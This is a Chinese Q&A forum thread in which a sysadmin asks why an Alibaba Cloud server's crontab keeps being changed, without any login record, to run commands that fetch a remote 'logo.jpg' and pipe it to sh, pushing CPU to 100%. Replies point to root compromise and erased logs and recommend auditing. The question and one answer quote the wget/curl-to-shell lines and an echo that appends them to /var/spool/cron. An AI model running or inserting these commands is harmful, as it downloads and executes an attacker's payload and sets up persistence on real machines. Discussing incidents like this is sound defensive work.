被人修改了某个用户的crontab,没有看到该用户在该时间前后登录过系统?

一台阿里云机器,被人修改了某个用户的crontab

/9 wget -O - -q http://91.230.47.40/common/logo.jpg|sh /10 curl http://91.230.47.40/common/logo.jpg|sh

导致这台CPU100%等问题。
查看/var/log/cron发现是该用户修改了cron,记录下修改时间
但是用last|more查看用户登录情况没有看到该用户在该时间前后登录过系统。
后来修改了用户的密码,去除了crontab中的内容,但是过几天发现crontab又被修改了。同时也没有该用户在期间有登录的信息。请问如何做到了,如何避免这种情况再次发生。团队中没有人去修改,有点像病毒一样或者被人攻击了。

3回答

赵海赵海  技术经理 , 大连
江南无烟雨赞同了此回答
root用户在谁手里?root用户什么都可以干,cron也可以通过修改/var/spool/cron下面的文件来实现。比如:echo "/9 * wget -O - -q http://91.230.47.40/common/logo.jpg|sh" >> /var/spool/cron/user 你现在可以追查两点: root用户的历史记录。 91.230.47.40 是什么IP...显示全部

root用户在谁手里?
root用户什么都可以干,cron也可以通过修改/var/spool/cron下面的文件来实现。
比如:
echo "/9 * wget -O - -q http://91.230.47.40/common/logo.jpg|sh" >> /var/spool/cron/user

你现在可以追查两点:

  1. root用户的历史记录。
  2. 91.230.47.40 是什么IP地址。
  3. root用户有没有设置过互信key,不用密码即可登录,设置的是谁的地址。

有可能是阿里云虚拟机集中管理的自动任务,自动推送到虚机上来的。

收起
 2017-09-04
浏览460
岳彩波岳彩波  产品经理 , 无
登陆记录都是可以删除的,最好能有审计方式做一下审计,或者把日志监控起来,抓取相关方面的。显示全部

登陆记录都是可以删除的,最好能有审计方式做一下审计,或者把日志监控起来,抓取相关方面的。

收起
 2017-09-04
浏览409
ACDanteACDante  技术经理 , STARSINO
是的,最好查清楚权限问题,登录记录是可以抹除的。有审计最好,没有可以考虑一下阿里云那边的,或者和阿里云沟通一下。显示全部

是的,最好查清楚权限问题,登录记录是可以抹除的。
有审计最好,没有可以考虑一下阿里云那边的,或者和阿里云沟通一下。

收起
 2017-09-05
浏览360
luodi 邀答

提问者

luodi系统运维工程师, nl

问题状态

  • 发布时间:2017-09-04
  • 关注会员:4 人
  • 问题浏览:815
  • 最近回答:2017-09-05
  • 关于TWT  使用指南  社区专家合作  厂商入驻社区  企业招聘  投诉建议  版权与免责声明  联系我们
    © 2019  talkwithtrend — talk with trend,talk with technologist 京ICP备09031017号-30